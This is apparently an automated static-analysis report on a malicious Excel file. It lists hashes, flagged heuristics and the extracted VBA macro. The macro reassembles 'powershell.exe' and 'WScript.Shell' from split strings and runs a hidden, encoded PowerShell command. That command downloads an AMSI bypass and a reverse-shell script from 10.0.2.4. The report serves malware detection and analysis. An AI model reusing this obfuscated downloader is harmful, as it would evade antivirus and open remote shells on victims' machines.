Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 c010977231ad75e9…

MALICIOUS

Office (OOXML)

Size: 13.5 KB
Created: 2021-01-14 10:29:54 UTC
Authoring application: Microsoft Excel 15.0300
First seen: 2021-01-23
MD5: 11c7987010259df380a450ad84d5907a
SHA-1: 7621427a40e45489db421347a7b8a2194062205e
SHA-256: c010977231ad75e9d7f1665984ca00be98ac71e40c51264690ed763d0cf9ebdc
Risk Score: 180

Heuristics 4

  • VBA project inside OOXML (severity: medium; 3 related findings; rule: OOXML_VBA)
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage (severity: critical; rule: OLE_VBA_WSCRIPT)
    WScript.Shell usage
    Matched line in script
        CreateObject("WScript.Shell").Run (awdfty & Str)
  • Dangerous API name reassembled from split string literals (severity: critical; rule: OLE_VBA_SPLIT_KEYWORD_OBFUSCATION)
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
    Matched line in script
        CreateObject("WScript.Shell").Run (awdfty & Str)
  • CreateObject call (severity: high; rule: OLE_VBA_CREATEOBJ)
    CreateObject call
    Matched line in script
        CreateObject("WScript.Shell").Run (awdfty & Str)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1444 bytes
SHA-256: 41ca802c250cc30a04ad66fd3dd26d37ee609ac5da50803453698ce9211bf504
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Sub Test()
    Dim Str As String
    Dim awdfty
    Dim CrObct
    Dim WSSll
    
    awdfty = "p" & "o" & "w" & "e" & "r" & "s" & "h" & "e" & "l" & "l" & "." & "e" & "x" & "e" & " "
    CrObct = "C" & "r" & "e" & "a" & "t" & "e" & "O" & "b" & "j" & "e" & "c" & "t"
    WSSll = "W" & "S" & "c" & "r" & "i" & "p" & "t" & "." & "S" & "h" & "e" & "l" & "l"
    
    Str = Str + "-nop -w hidden -e aQBlAHgAKABpAHcAc"
    Str = Str + "gAgAGgAdAB0AHAAOgAvAC8AMQAwAC4AMAAuADIALgA0AC8AYQB"
    Str = Str + "tAHMAaQBiAHkAcABhAHMAcwApADsAaQBlAHgAKABpAHcAcgAgA"
    Str = Str + "GgAdAB0AHAAOgAvAC8AMQAwAC4AMAAuADIALgA0AC8ASQBuAHY"
    Str = Str + "AbwBrAGUALQBQAG8AdwBlAHIAUwBoAGUAbABsAFQAYwBwAC4Ac"
    Str = Str + "ABzADEAKQA="
    
    CreateObject("WScript.Shell").Run (awdfty & Str)

End Sub

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 16896 bytes
SHA-256: b5377b968809fdac36028134009c3cd19d1067dea98f43d6feb799a680bcc40f